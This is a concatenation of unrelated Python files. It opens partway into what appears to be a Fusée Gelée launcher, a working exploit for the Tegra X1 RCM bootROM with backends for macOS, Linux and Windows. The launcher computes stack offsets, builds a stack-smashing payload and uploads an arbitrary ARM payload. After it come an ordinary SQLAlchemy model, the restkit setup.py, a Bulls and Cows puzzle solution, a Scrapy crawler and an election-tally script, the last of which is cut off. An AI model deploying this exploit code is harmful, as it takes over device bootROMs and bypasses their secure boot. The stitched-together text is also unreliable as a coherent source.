Writes a single RCM buffer, which should be USB_XFER_MAX long.
The last packet may be shorter, and should trigger a ZLP (e.g. not divisible by 512).
If it's not, send a ZLP.
"""
return self.dev.write(0x01, data, 3000)
def find_device(self, vid=None, pid=None):
""" Set and return the device to be used """
# os.environ['PYUSB_DEBUG'] = 'debug'
os.environ['PYUSB_DEBUG'] = 'info'
import usb
self.dev = usb.core.find(idVendor=vid, idProduct=pid)
return self.dev
class MacOSBackend(HaxBackend):
"""
Simple vulnerability trigger for macOS: we simply ask libusb to issue
the broken control request, and it'll do it for us. :)
We also support platforms with a hacked libusb and FreeBSD.
"""
BACKEND_NAME = "macOS"
SUPPORTED_SYSTEMS = ['Darwin', 'libusbhax', 'macos', 'FreeBSD']
def trigger_vulnerability(self, length):
# Triggering the vulnerability is simplest on macOS; we simply issue the control request as-is.
r = self.dev.ctrl_transfer(self.STANDARD_REQUEST_DEVICE_TO_HOST_TO_ENDPOINT, self.GET_STATUS, 0, 0, length)
return bytes(r)
class LinuxBackend(HaxBackend):
"""
More complex vulnerability trigger for Linux: we can't go through libusb,
as it limits control requests to a single page size, the limitation expressed
by the usbfs. More realistically, the usbfs seems fine with it, and we just
need to work around libusb.
"""
BACKEND_NAME = "Linux"
SUPPORTED_SYSTEMS = ['Linux', 'linux']
SUPPORTED_USB_CONTROLLERS = ['pci/drivers/xhci_hcd', 'platform/drivers/dwc_otg']
SETUP_PACKET_SIZE = 8
IOCTL_IOR = 0x80000000
IOCTL_TYPE = ord('U')
IOCTL_NR_SUBMIT_URB = 10
URB_CONTROL_REQUEST = 2
class SubmitURBIoctl(ctypes.Structure):
_fields_ = [
('type', ctypes.c_ubyte),
('endpoint', ctypes.c_ubyte),
('status', ctypes.c_int),
('flags', ctypes.c_uint),
('buffer', ctypes.c_void_p),
('buffer_length', ctypes.c_int),
('actual_length', ctypes.c_int),
('start_frame', ctypes.c_int),
('stream_id', ctypes.c_uint),
('error_count', ctypes.c_int),
('signr', ctypes.c_uint),
('usercontext', ctypes.c_void_p),
]
def print_warnings(self):
""" Print any warnings necessary for the given backend. """
print("\nImportant note: on desktop Linux systems, we currently require an XHCI host controller.")
print("A good way to ensure you're likely using an XHCI backend is to plug your")
print("device into a blue 'USB 3' port.\n")
def trigger_vulnerability(self, length):
"""
Submit the control request directly using the USBFS submit_urb
ioctl, which issues the control request directly. This allows us
to send our giant control request despite size limitations.
"""
import os
import fcntl
# We only work for devices that are bound to a compatible HCD.
self._validate_environment()
# Figure out the USB device file we're going to use to issue the
# control request.
fd = os.open('/dev/bus/usb/{:0>3d}/{:0>3d}'.format(self.dev.bus, self.dev.address), os.O_RDWR)
# Define the setup packet to be submitted.
setup_packet = \
int.to_bytes(self.STANDARD_REQUEST_DEVICE_TO_HOST_TO_ENDPOINT, 1, byteorder='little') + \
int.to_bytes(self.GET_STATUS, 1, byteorder='little') + \
int.to_bytes(0, 2, byteorder='little') + \
int.to_bytes(0, 2, byteorder='little') + \
int.to_bytes(length, 2, byteorder='little')
# Create a buffer to hold the result.
buffer_size = self.SETUP_PACKET_SIZE + length
buffer = ctypes.create_string_buffer(setup_packet, buffer_size)
# Define the data structure used to issue the control request URB.
request = self.SubmitURBIoctl()
request.type = self.URB_CONTROL_REQUEST
request.endpoint = 0
request.buffer = ctypes.addressof(buffer)
request.buffer_length = buffer_size
# Manually submit an URB to the kernel, so it issues our 'evil' control request.
ioctl_number = (self.IOCTL_IOR | ctypes.sizeof(request) << 16 | ord('U') << 8 | self.IOCTL_NR_SUBMIT_URB)
fcntl.ioctl(fd, ioctl_number, request, True)
# Close our newly created fd.
os.close(fd)
# The other modules raise an IOError when the control request fails to complete. We don't fail out (as we don't bother
# reading back), so we'll simulate the same behavior as the others.
raise IOError("Raising an error to match the others!")
def _validate_environment(self):
"""
We can only inject giant control requests on devices that are backed
by certain usb controllers-- typically, the xhci_hcd on most PCs.
"""
from glob import glob
# If we're overriding checks, never fail out.
if self.skip_checks:
print("skipping checks")
return
# Search each device bound to the xhci_hcd driver for the active device...
for hci_name in self.SUPPORTED_USB_CONTROLLERS:
for path in glob("/sys/bus/{}/*/usb*".format(hci_name)):
if self._node_matches_our_device(path):
return
raise ValueError("This device needs to be on a supported backend. Usually that means plugged into a blue/USB 3.0 port!\nBailing out.")
def _node_matches_our_device(self, path):
"""
Checks to see if the given sysfs node matches our given device.
Can be used to check if an xhci_hcd controller subnode reflects a given device.,
"""
# If this isn't a valid USB device node, it's not what we're looking for.
if not os.path.isfile(path + "/busnum"):
return False
# We assume that a whole _bus_ is associated with a host controller driver, so we
# only check for a matching bus ID.
if self.dev.bus != self._read_num_file(path + "/busnum"):
return False
# If all of our checks passed, this is our device.
return True
def _read_num_file(self, path):
"""
Reads a numeric value from a sysfs file that contains only a number.
"""
with open(path, 'r') as f:
raw = f.read()
return int(raw)
class WindowsBackend(HaxBackend):
"""
Use libusbK for most of it, and use the handle libusbK gets for us to call kernel32's DeviceIoControl
"""
BACKEND_NAME = "Windows"
SUPPORTED_SYSTEMS = ["Windows"]
# Windows and libusbK specific constants
WINDOWS_FILE_DEVICE_UNKNOWN = 0x00000022
LIBUSBK_FUNCTION_CODE_GET_STATUS = 0x807
WINDOWS_METHOD_BUFFERED = 0
WINDOWS_FILE_ANY_ACCESS = 0
RAW_REQUEST_STRUCT_SIZE = 24 # 24 is how big the struct is, just trust me
TO_ENDPOINT = 2
# Yoinked (with love) from Windows' CTL_CODE macro
def win_ctrl_code(self, DeviceType, Function, Method, Access):
""" Return a control code for use with DeviceIoControl() """
return ((DeviceType) << 16 | ((Access) << 14) | ((Function)) << 2 | (Method))
def __init__(self, skip_checks):
import libusbK
self.libk = libusbK
# Grab libusbK
self.lib = ctypes.cdll.libusbK
def find_device(self, Vid, Pid):
"""
Windows version of this function
Its return isn't actually significant, but it needs to be not None
"""
# Get a list of devices to use later
device_list = self.libk.KLST_HANDLE()
device_info = ctypes.pointer(self.libk.KLST_DEV_INFO())
ret = self.lib.LstK_Init(ctypes.byref(device_list), 0)
if ret == 0:
raise ctypes.WinError()
# Get info for a device with that vendor ID and product ID
device_info = ctypes.pointer(self.libk.KLST_DEV_INFO())
ret = self.lib.LstK_FindByVidPid(device_list, Vid, Pid, ctypes.byref(device_info))
self.lib.LstK_Free(ctypes.byref(device_list))
if device_info is None or ret == 0:
return None
# Populate function pointers for use with the driver our device uses (which should be libusbK)
self.dev = self.libk.KUSB_DRIVER_API()
ret = self.lib.LibK_LoadDriverAPI(ctypes.byref(self.dev), device_info.contents.DriverID)
if ret == 0:
raise ctypes.WinError()
# Initialize the driver for use with our device
self.handle = self.libk.KUSB_HANDLE(None)
ret = self.dev.Init(ctypes.byref(self.handle), device_info)
if ret == 0:
raise self.libk.WinError()
return self.dev
def read(self, length):
""" Read using libusbK """
# Create the buffer to store what we read
buffer = ctypes.create_string_buffer(length)
len_transferred = ctypes.c_uint(0)
# Call libusbK's ReadPipe using our specially-crafted function pointer and the opaque device handle
ret = self.dev.ReadPipe(self.handle, ctypes.c_ubyte(0x81), ctypes.addressof(buffer), ctypes.c_uint(length), ctypes.byref(len_transferred), None)
if ret == 0:
raise ctypes.WinError()
return buffer.raw
def write_single_buffer(self, data):
""" Write using libusbK """
# Copy construct to a bytearray so we Know™ what type it is
buffer = bytearray(data)
# Convert wrap the data for use with ctypes
cbuffer = (ctypes.c_ubyte * len(buffer))(*buffer)
len_transferred = ctypes.c_uint(0)
# Call libusbK's WritePipe using our specially-crafted function pointer and the opaque device handle
ret = self.dev.WritePipe(self.handle, ctypes.c_ubyte(0x01), cbuffer, len(data), ctypes.byref(len_transferred), None)
if ret == 0:
raise ctypes.WinError()
def ioctl(self, driver_handle: ctypes.c_void_p, ioctl_code: ctypes.c_ulong, input_bytes: ctypes.c_void_p, input_bytes_count: ctypes.c_size_t, output_bytes: ctypes.c_void_p, output_bytes_count: ctypes.c_size_t):
""" Wrapper for DeviceIoControl """
overlapped = self.libk.OVERLAPPED()
ctypes.memset(ctypes.addressof(overlapped), 0, ctypes.sizeof(overlapped))
ret = ctypes.windll.kernel32.DeviceIoControl(driver_handle, ioctl_code, input_bytes, input_bytes_count, output_bytes, output_bytes_count, None, ctypes.byref(overlapped))
# We expect this to error, which matches the others ^_^
if ret == False:
raise ctypes.WinError()
def trigger_vulnerability(self, length):
"""
Go over libusbK's head and get the master handle it's been using internally
and perform a direct DeviceIoControl call to the kernel to skip the length check
"""
# self.handle is KUSB_HANDLE, cast to KUSB_HANDLE_INTERNAL to transparent-ize it
internal = ctypes.cast(self.handle, ctypes.POINTER(self.libk.KUSB_HANDLE_INTERNAL))
# Get the handle libusbK has been secretly using in its ioctl calls this whole time
master_handle = internal.contents.Device.contents.MasterDeviceHandle
if master_handle is None or master_handle == self.libk.INVALID_HANDLE_VALUE:
raise ValueError("Failed to initialize master handle")
# the raw request struct is pretty annoying, so I'm just going to allocate enough memory and set the few fields I need
raw_request = ctypes.create_string_buffer(self.RAW_REQUEST_STRUCT_SIZE)
# set timeout to 1000 ms, timeout offset is 0 (since it's the first member), and it's an unsigned int
timeout_p = ctypes.cast(raw_request, ctypes.POINTER(ctypes.c_uint))
timeout_p.contents = ctypes.c_ulong(1000) # milliseconds
status_p = ctypes.cast(ctypes.byref(raw_request, 4), ctypes.POINTER(self.libk.status_t))
status_p.contents.index = self.GET_STATUS
status_p.contents.recipient = self.TO_ENDPOINT
buffer = ctypes.create_string_buffer(length)
code = self.win_ctrl_code(self.WINDOWS_FILE_DEVICE_UNKNOWN, self.LIBUSBK_FUNCTION_CODE_GET_STATUS, self.WINDOWS_METHOD_BUFFERED, self.WINDOWS_FILE_ANY_ACCESS)
ret = self.ioctl(master_handle, ctypes.c_ulong(code), raw_request, ctypes.c_size_t(24), buffer, ctypes.c_size_t(length))
if ret == False:
raise ctypes.WinError()
class RCMHax:
# Default to the T30 RCM VID and PID.
DEFAULT_VID = 0x0955
DEFAULT_PID = 0x7330
# Exploit specifics
COPY_BUFFER_ADDRESSES = [0x40003000, 0x40005000] # The addresses of the DMA buffers we can trigger a copy _from_.
STACK_END = 0x4000A000 # The address just after the end of the device's stack.
def __init__(self, wait_for_device=False, os_override=None, vid=None, pid=None, override_checks=False):
""" Set up our RCM hack connection."""
# The first write into the bootROM touches the lowbuffer.
self.current_buffer = 0
# Keep track of the total amount written.
self.total_written = 0
# Create a vulnerability backend for the given device.
try:
self.backend = HaxBackend.create_appropriate_backend(system_override=os_override, skip_checks=override_checks)
except IOError:
print("It doesn't look like we support your OS, currently. Sorry about that!\n")
sys.exit(-1)
# Grab a connection to the USB device itself.
self.dev = self._find_device(vid, pid)
# self.dev = "lol"
self.overwrite_len = None
self.EndpointStatus_stack_addr = None
self.ProcessSetupPacket_SP = None
self.InnerMemcpy_LR_stack_addr = None
# If we don't have a device...
if self.dev is None:
# ... and we're allowed to wait for one, wait indefinitely for one to appear...
if wait_for_device:
print("Waiting for a TegraRCM device to come online...")
while self.dev is None:
self.dev = self._find_device(vid, pid)
# ... or bail out.
else:
raise IOError("No TegraRCM device found?")
# Print any use-related warnings.
self.backend.print_warnings()
# Notify the user of which backend we're using.
print("Identified a {} system; setting up the appropriate backend.".format(self.backend.BACKEND_NAME))
def _find_device(self, vid=None, pid=None):
""" Attempts to get a connection to the RCM device with the given VID and PID. """
# Apply our default VID and PID if neither are provided...
vid = vid if vid else self.DEFAULT_VID
pid = pid if pid else self.DEFAULT_PID
# ... and use them to find a USB device.
return self.backend.find_device(vid, pid)
def read(self, length):
""" Reads data from the RCM protocol endpoint. """
return self.backend.read(length)
def write(self, data):
""" Writes data to the main RCM protocol endpoint. """
length = len(data)
print("txing {} bytes total".format(length))
packet_size = USB_XFER_MAX
length_sent = 0
while length:
data_to_transmit = min(length, packet_size)
print("txing {} bytes ({} already sent) to buf[{}] 0x{:08x}".format(data_to_transmit, length_sent, self.current_buffer, self.get_current_buffer_address()))
length -= data_to_transmit
chunk = data[:data_to_transmit]
data = data[data_to_transmit:]
self.write_single_buffer(chunk)
length_sent += data_to_transmit
def write_single_buffer(self, data):
"""
Writes a single RCM buffer, which should be USB_XFER_MAX long.
The last packet may be shorter, and should trigger a ZLP (e.g. not divisible by 512).
If it's not, send a ZLP.
"""
self._toggle_buffer()
try:
return self.backend.write_single_buffer(data)
except Exception as err:
print("USBError: {}".format(err))
rcm_err = self.read(4)
# print("RCM error buf: {}".format(rcm_err))
# rcm_err_int = ctypes.c_uint32.from_buffer_copy(rcm_err).value
rcm_err_int = struct.unpack('>I', rcm_err)
# print("RCM error buf: 0x{:08x}".format(rcm_err_int))
raise RCMError(rcm_err_int)
def _toggle_buffer(self):
"""
Toggles the active target buffer, paralleling the operation happening in
RCM on the X1 device.
"""
self.current_buffer = 1 - self.current_buffer
def get_current_buffer_address(self):
""" Returns the base address for the current copy. """
return self.COPY_BUFFER_ADDRESSES[self.current_buffer]
def read_device_id(self):
""" Reads the Device ID via RCM. Only valid at the start of the communication. """
return self.read(16)
def read_stack(self):
return self.backend.read_ep0(0x10)
def get_overwrite_length(self):
# overwrite_len = 0x00004f20
if self.overwrite_len is None:
stack_snapshot = self.read_stack()
print("Stack snapshot: {}".format(binascii.hexlify(stack_snapshot)))
self.EndpointStatus_stack_addr = struct.unpack('<I', stack_snapshot[0xC:0xC+4])[0]
print("EndpointStatus_stack_addr: 0x{:08x}".format(self.EndpointStatus_stack_addr))
self.ProcessSetupPacket_SP = self.EndpointStatus_stack_addr - 0xC
print("ProcessSetupPacket SP: 0x{:08x}".format(self.ProcessSetupPacket_SP))
self.InnerMemcpy_LR_stack_addr = self.ProcessSetupPacket_SP - 2 * 4 - 2 * 4
print("InnerMemcpy LR stack addr: 0x{:08x}".format(self.InnerMemcpy_LR_stack_addr))
self.overwrite_len = self.InnerMemcpy_LR_stack_addr - self.COPY_BUFFER_ADDRESSES[1]
print("overwrite_len: 0x{:08x}".format(self.overwrite_len))
return self.overwrite_len
def switch_to_highbuf(self):
""" Switches to the higher RCM buffer, reducing the amount that needs to be copied. """
if self.get_current_buffer_address() != self.COPY_BUFFER_ADDRESSES[1]:
self.write(b'\0' * USB_XFER_MAX)
def trigger_controlled_memcpy(self, length=None):
""" Triggers the RCM vulnerability, causing it to make a signficantly-oversized memcpy. """
# Determine how much we'd need to transmit to smash the full stack.
if length is None:
# length = self.STACK_END - self.get_current_buffer_address()
length = self.get_overwrite_length()
print("sending status request with length 0x{:08x}".format(length))
return self.backend.trigger_vulnerability(length)
def get_overwite_payload_off(self, intermezzo_size):
overwrite_len = self.get_overwrite_length()
overall_payload_overwrite_len = overwrite_len - (RCM_PAYLOAD_ADDR - self.EndpointStatus_stack_addr)
overwrite_payload_off = overall_payload_overwrite_len - intermezzo_size - 4
return overwrite_payload_off
def get_payload_first_length(self, intermezzo_size, payload_length):
overwrite_payload_off = self.get_overwite_payload_off(intermezzo_size)
print("overwrite_payload_off: 0x{:08x}".format(overwrite_payload_off))
return min(payload_length, overwrite_payload_off)
def get_payload_second_length(self, intermezzo_size, payload_length):
return max(0, payload_length - self.get_payload_first_length(intermezzo_size, payload_length))
def get_patched_intermezzo(self, intermezzo_bin, payload_length):
overwrite_len = self.get_overwrite_length()
intermezzo_start_addr_magic = struct.pack('<I', 0x50004000)
intermezzo_start_addr_off = intermezzo_bin.find(intermezzo_start_addr_magic)
intermezzo_start_addr = RCM_PAYLOAD_ADDR
intermezzo_reloc_addr = self.COPY_BUFFER_ADDRESSES[0]
payload_first_length = self.get_payload_first_length(len(intermezzo_bin), payload_length)
print("payload_first_length: 0x{:08x}".format(payload_first_length))
payload_second_length = self.get_payload_second_length(len(intermezzo_bin), payload_length)
print("payload_second_length: 0x{:08x}".format(payload_second_length))
patched_vals = struct.pack('<IIII',
intermezzo_start_addr, intermezzo_reloc_addr,
payload_first_length, payload_second_length)
print(binascii.hexlify(patched_vals))
patched_intermezzo_bin = intermezzo_bin[:intermezzo_start_addr_off] + patched_vals + intermezzo_bin[intermezzo_start_addr_off + len(patched_vals):]
return patched_intermezzo_bin
def parse_usb_id(id):
""" Quick function to parse VID/PID arguments. """
return int(id, 16)
# Read our arguments.
parser = argparse.ArgumentParser(description='launcher for the fusee gelee exploit (by @ktemkin)')
parser.add_argument('payload', metavar='payload', type=str, help='ARM payload to be launched; should be linked at 0x40010000')
parser.add_argument('-w', dest='wait', action='store_true', help='wait for an RCM connection if one isn\'t present')
parser.add_argument('-V', metavar='vendor_id', dest='vid', type=parse_usb_id, default=None, help='overrides the TegraRCM vendor ID')
parser.add_argument('-P', metavar='product_id', dest='pid', type=parse_usb_id, default=None, help='overrides the TegraRCM product ID')
parser.add_argument('--override-os', metavar='platform', dest='platform', type=str, default=None, help='overrides the detected OS; for advanced users only')
parser.add_argument('--relocator', metavar='binary', dest='relocator', type=str, default="%s/intermezzo.bin" % os.path.dirname(os.path.abspath(__file__)), help='provides the path to the intermezzo relocation stub')
parser.add_argument('--override-checks', dest='skip_checks', action='store_true', help="don't check for a supported controller; useful if you've patched your EHCI driver")
parser.add_argument('--allow-failed-id', dest='permissive_id', action='store_true', help="continue even if reading the device's ID fails; useful for development but not for end users")
parser.add_argument('--tty', dest='tty_mode', action='store_true', help="Enable TTY mode after payload launch")
arguments = parser.parse_args()
# Expand out the payload path to handle any user-refrences.
payload_path = os.path.expanduser(arguments.payload)
if not os.path.isfile(payload_path):
print("Invalid payload path specified!")
sys.exit(-1)
# Find our intermezzo relocator...
intermezzo_path = os.path.expanduser(arguments.relocator)
if not os.path.isfile(intermezzo_path):
print("Could not find the intermezzo interposer. Did you build it?")
sys.exit(-1)
# Get a connection to our device.
try:
switch = RCMHax(wait_for_device=arguments.wait, vid=arguments.vid,
pid=arguments.pid, os_override=arguments.platform, override_checks=arguments.skip_checks)
except IOError as e:
print(e)
sys.exit(-1)
intermezzo = None
intermezzo_size = None
with open(intermezzo_path, "rb") as f:
intermezzo = f.read()
intermezzo_size = len(intermezzo)
print("intermezzo_size: 0x{:08x}".format(intermezzo_size))
target_payload = None
target_payload_size = None
with open(payload_path, "rb") as f:
target_payload = f.read()
target_payload_size = len(target_payload)
print("target_payload_size: 0x{:08x}".format(target_payload_size))
# Print the device's ID. Note that reading the device's ID is necessary to get it into
try:
device_id = switch.read_device_id()
# device_id = b'0000'
print("Found a Tegra with Device ID: {}".format(binascii.hexlify(device_id)))
except OSError as e:
# Raise the exception only if we're not being permissive about ID reads.
if not arguments.permissive_id:
raise e
patched_intermezzo = switch.get_patched_intermezzo(intermezzo, target_payload_size)
with open("intermezzo_patched.bin", "wb") as f:
f.write(patched_intermezzo)
# sys.exit(0)
# Prefix the image with an RCM command, so it winds up loaded into memory
# at the right location (0x40010000).
RCM_HEADER_SIZE = RCM_V1_HEADER_SIZE
# Use the maximum length accepted by RCM, so we can transmit as much payload as
# we want; we'll take over before we get to the end.
length = 0x30000 + RCM_HEADER_SIZE - 0x10
payload = length.to_bytes(4, byteorder='little')
print("Setting rcm msg size to 0x{:08x}".format(length))
print("RCM payload (len_insecure): {}".format(binascii.hexlify(payload)))
# pad out to RCM_HEADER_SIZE so the payload starts at the right address in IRAM
payload += b'\0' * (RCM_HEADER_SIZE - len(payload))
# Populate from [RCM_PAYLOAD_ADDR, INTERMEZZO_LOCATION) with the payload address.
# We'll use this data to smash the stack when we execute the vulnerable memcpy.
print("\nSetting ourselves up to smash the stack...")
print("Payload offset of intermezzo: 0x{:08x}".format(len(payload)))
# Include the Intermezzo binary in the command stream. This is our first-stage
# payload, and it's responsible for relocating the final payload to 0x40010000.
payload += patched_intermezzo
payload_first_length = switch.get_payload_first_length(intermezzo_size, target_payload_size)
payload += target_payload[:payload_first_length]
overwrite_len = switch.get_overwrite_length()
print("overwrite_len: 0x{:08x}".format(overwrite_len))
payload_overwrite_len = overwrite_len - (RCM_PAYLOAD_ADDR - switch.EndpointStatus_stack_addr)
print("payload_overwrite_len: 0x{:08x}".format(payload_overwrite_len))
overwrite_payload_off = switch.get_overwite_payload_off(intermezzo_size)
print("overwrite_payload_off: 0x{:08x}".format(overwrite_payload_off))
smash_padding = 0
if payload_first_length < overwrite_payload_off:
smash_padding = overwrite_payload_off - payload_first_length
print("smash_padding: 0x{:08x}".format(smash_padding))
payload += b'\0' * smash_padding
payload += RCM_PAYLOAD_ADDR.to_bytes(4, byteorder='little')
# overwrite_payload_off = switch.get_overwite_payload_off(intermezzo_size)
# smash_padding = 0
# if payload_first_length < overwrite_payload_off:
# smash_padding = overwrite_payload_off - payload_first_length - 0x100
# print("smash_padding: 0x{:08x}".format(smash_padding))
# payload += b'\0' * smash_padding
# payload += (RCM_PAYLOAD_ADDR.to_bytes(4, byteorder='little') * 0x4000)
payload_second_length = switch.get_payload_second_length(intermezzo_size, target_payload_size)
if payload_second_length > 0:
payload += target_payload[payload_first_length:]
# Pad the payload to fill a USB request exactly, so we don't send a short
# packet and break out of the RCM loop.
payload_length = len(payload)
padding_size = USB_XFER_MAX - (payload_length % USB_XFER_MAX)
payload += (b'\0' * padding_size)
with open("payload.bin", "wb") as f:
f.write(payload)
with open("payload_no_header.bin", "wb") as f:
f.write(payload[RCM_HEADER_SIZE:])
# Check to see if our payload packet will fit inside the RCM high buffer.
# If it won't, error out.
if len(payload) > length:
size_over = len(payload) - length
print("ERROR: Payload is too large to be submitted via RCM. ({} bytes larger than max).".format(size_over))
sys.exit(errno.EFBIG)
# sys.exit(0)
# Send the constructed payload, which contains the command, the stack smashing
# values, the Intermezzo relocation stub, and the final payload.
print("Uploading payload...")
switch.write(payload)
# The RCM backend alternates between two different DMA buffers. Ensure we're
# about to DMA into the higher one, so we have less to copy during our attack.
switch.switch_to_highbuf()
# Smash the device's stack, triggering the vulnerability.
print("Smashing the stack...")
try:
switch.trigger_controlled_memcpy()
except ValueError as e:
print(str(e))
except IOError:
print("The USB device stopped responding-- sure smells like we've smashed its stack. :)")
print("Launch complete!")
if arguments.tty_mode:
while True:
buf = switch.read(USB_XFER_MAX)
print(binascii.hexlify(buf))
try:
print(buf.decode('utf-8'))
except UnicodeDecodeError:
pass
|
from sqlalchemy import Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import create_engine
from . import app
from datetime import datetime
Base = declarative_base()
class User(Base):
__tablename__ = 'user'
id = Column(Integer, primary_key=True)
name = Column(String(250), nullable=False)
otp_secret = Column(String(100), nullable=False)
alert_type = Column(String(250), nullable=False)
action = Column(String(250), nullable=False)
missed_alerts = Column(Integer, nullable=True)
alert_times = Column(String(250), nullable=False)
threshold = Column(Integer, nullable=False)
@property
def smallest_diff(self):
diff = 100000000
for t in self.alert_times.split(' '):
hours, minutes = t.split(':')
now = datetime.now()
db_time = now.replace(hour=int(hours), minute=int(minutes), second=0, microsecond=0)
seconds_diff = abs(db_time - now).total_seconds()
if seconds_diff < diff:
diff = seconds_diff
return diff
def __str__(self):
return f'name: {self.name}\nalert_type: {self.alert_type}\naction: {self.action}\n\
missed_alerts: {self.missed_alerts}\n threshold: {self.threshold}'
def create():
engine = create_engine('sqlite:///' + app.config['DB_FILE'])
Base.metadata.create_all(engine)
|
#!/usr/bin/env python
# -*- coding: utf-8 -
#
# This file is part of restkit released under the MIT license.
# See the NOTICE for more information.
from setuptools import setup, find_packages
import glob
from imp import load_source
import os
import sys
if not hasattr(sys, 'version_info') or sys.version_info < (2, 6, 0, 'final'):
raise SystemExit("Restkit requires Python 2.6 or later.")
extras = {}
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Software Development :: Libraries']
SCRIPTS = ['scripts/restcli']
def main():
version = load_source("version", os.path.join("restkit",
"version.py"))
# read long description
with open(os.path.join(os.path.dirname(__file__), 'README.rst')) as f:
long_description = f.read()
DATA_FILES = [
('restkit', ["LICENSE", "MANIFEST.in", "NOTICE", "README.rst",
"THANKS", "TODO.txt"])
]
options=dict(
name = 'restkit',
version = version.__version__,
description = 'Python REST kit',
long_description = long_description,
author = 'Benoit Chesneau',
author_email = 'benoitc@e-engura.org',
license = 'MIT',
url = 'http://benoitc.github.com/restkit',
classifiers = CLASSIFIERS,
packages = find_packages(exclude=['tests']),
data_files = DATA_FILES,
scripts = SCRIPTS,
zip_safe = False,
entry_points = {
'paste.app_factory': [
'proxy = restkit.contrib.wsgi_proxy:make_proxy',
'host_proxy = restkit.contrib.wsgi_proxy:make_host_proxy',
'couchdb_proxy = restkit.contrib.wsgi_proxy:make_couchdb_proxy',
]},
install_requires = [
'http-parser>=0.8.3',
'socketpool>=0.5.3'],
test_suite = 'nose.collector'
)
setup(**options)
if __name__ == "__main__":
main()
|
# Bulls and Cows
'''
You are playing the following Bulls and Cows game with your friend:
You write down a number and ask your friend to guess what the number is.
Each time your friend makes a guess, you provide a hint that indicates
how many digits in said guess match your secret number exactly in both
digit and position (called "bulls") and how many digits match the secret
number but locate in the wrong position (called "cows"). Your friend will
use successive guesses and hints to eventually derive the secret number.
Write a function to return a hint according to the secret number and friend's
guess, use A to indicate the bulls and B to indicate the cows.
Please note that both secret number and friend's guess may contain duplicate digits.
Test Cases
1) "1807" "7810" ==> 1A3B
1#07 7#10
2) "1122" "2211" ==> 0A4B
3) "1" "0" ==> 0A0B
4) "1122" "1111" ==> 2A0B
##22 ##11
5) "1123" "0111" ==> 1A1B
1#23 0#11
6) "1111" "1122" ==> 2A0B
##11 ##22
7) "1122" "2210" ==> 0A3B
Bulls:
- same position, same value
Cows:
- Match value but wrong position
'''
##################################################
# Solution 1 #
# 152 / 152 test cases passed. #
# Runtime: 80 ms #
# Memory Usage: 13.8 MB #
##################################################
def getHint(secret: str, guess: str) -> str:
bulls = cows = 0
sec2 = []
gus2 = []
for i in range(len(secret)):
if secret[i] == guess[i]:
bulls = bulls + 1
else:
sec2.append(secret[i])
gus2.append(guess[i])
#print("sec2 {}, gus2 {}".format(sec2, gus2))
for i in range(len(sec2)):
if sec2[i] in gus2:
cows = cows + 1
gus2.remove(sec2[i])
return str(bulls) + "A" + str(cows) + "B"
##################################################
# Fastest Solution #
# Runtime: 80 ms #
##################################################
class Solution:
def getHint(self, secret: str, guess: str) -> str:
bull=0
for i in range(len(secret)):
bull += int(secret[i] == guess[i])
# This loop will take care of "cow" cases
cows=0
for c in set(secret):
cows += min(secret.count(c), guess.count(c))
return f"{bull}A{cows-bull}B"
if __name__ == "__main__":
group = [['1807','7810'],['1122','2211'],['1','0'],['1122','1111'],['1123','0111'],['1111','1122']]
'''
1) "1807" "7810" ==> 1A3B
2) "1122" "2211" ==> 0A4B
3) "1" "0" ==> 0A0B
4) "1122" "1111" ==> 2A0B
5) "1123" "0111" ==> 1A1B
6) "1111" "1122" ==> 2A0B
'''
for a in group:
print("Secret {}, Guess {}, Hint: {}".format(a[0], a[1], getHint(a[0],a[1]))) |
from scrapy.item import Field
from scrapy.item import Item
from scrapy.spiders import CrawlSpider, Rule
from scrapy.selector import Selector
from scrapy.loader.processors import MapCompose
from scrapy.linkextractors import LinkExtractor
from scrapy.loader import ItemLoader
class Propiedad(Item):
informacion = Field()
# Crawler
class UrbaniaCrawler(CrawlSpider):
name = 'Urbania'
custom_settings = {
'USER_AGENT': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/71.0.3578.80 Chrome/71.0.3578.80 Safari/537.36',
'CLOSESPIDER_PAGECOUNT': 70
}
allowed_domains = ['grupourbania.com.mx']
start_urls = ['https://www.grupourbania.com.mx/resultados.php?estado=CDMX&delegacion=&colonia=&min_precio=1764560&max_precio=&min_tam=77&recamaras=',
'https://www.grupourbania.com.mx/resultados.php?estado=Quer%C3%A9taro&delegacion=&colonia=&min_precio=955000&max_precio=3308216&min_tam=98&recamaras=']
download_delay = 1
rules = (
# Horizontalidad por tipo de información (Noticias o videos)
Rule(
LinkExtractor(
allow=r'/casas-y-departamentos/'
),
follow=True,
callback='parse_propiedad'
),
)
def limpia(self, text):
return text.replace("\t","").replace("\r","").replace("\n","").strip()
def parse_propiedad(self, response):
item = ItemLoader(Propiedad(), response)
item.add_xpath('informacion', '//div[@class="development-section__data-block"]/div/text()', MapCompose(self.limpia))
yield item.load_item() |
import os
import csv
from statistics import mean
csvpath = os.path.join('Resources', 'election_data.csv')
with open(csvpath) as csvfile:
csvreader = csv.reader(csvfile, delimiter = ',')
csv_header = next(csvreader)
row_count = 0
candidates_with_votes = []
votes = {}
for row in csvreader:
row_count += 1
if row[2] in candidates_with_votes:
votes[row[2]] += 1
else:
candidates_with_votes.append(row[2])
votes[row[2]] = 1
total_votes = row_count
sorted_votes = sorted(votes.items(), reverse=True, key=lambda item: item[1])
print('Election Results')
print('-------------------------')
print('Total Votes: ' + str(total_votes))
print('-------------------------')
print(sorted_votes[0][0] + ': ' + str(round(100*sorted_votes[0][1]/total_votes,3)) +'% ' + '(' + str(sorted_votes[0][1]) + ')')
print(sorted_votes[1][0] + ': ' + str(round(100*sorted_votes[1][1]/total_votes,3)) +'% ' + '(' + str(sorted_votes[1][1]) + ')')
print(sorted_votes[2][0] + ': ' + str(round(100*sorted_votes[2][1]/total_votes,3)) +'% ' + '(' + str(sorted_votes[2][1]) + ')')
print(sorted_votes[3][0] + ': ' + str(round(100*sorted_votes[3][1]/total_votes,3)) +'% ' + '(' + str(sorted_votes[3][1]) + ')')
print('-------------------------')
print('Winner: ' + sorted_votes[0][0])
print('-------------------------')
first = sorted_votes[0][0]
perc_first = str(round(100*sorted_votes[0][1]/total_votes,3))
votes_first = str(sorted_votes[0][1])
second = sorted_votes[1][0]
perc_sec = str(round(100*sorted_votes[1][1]/total_votes,3))
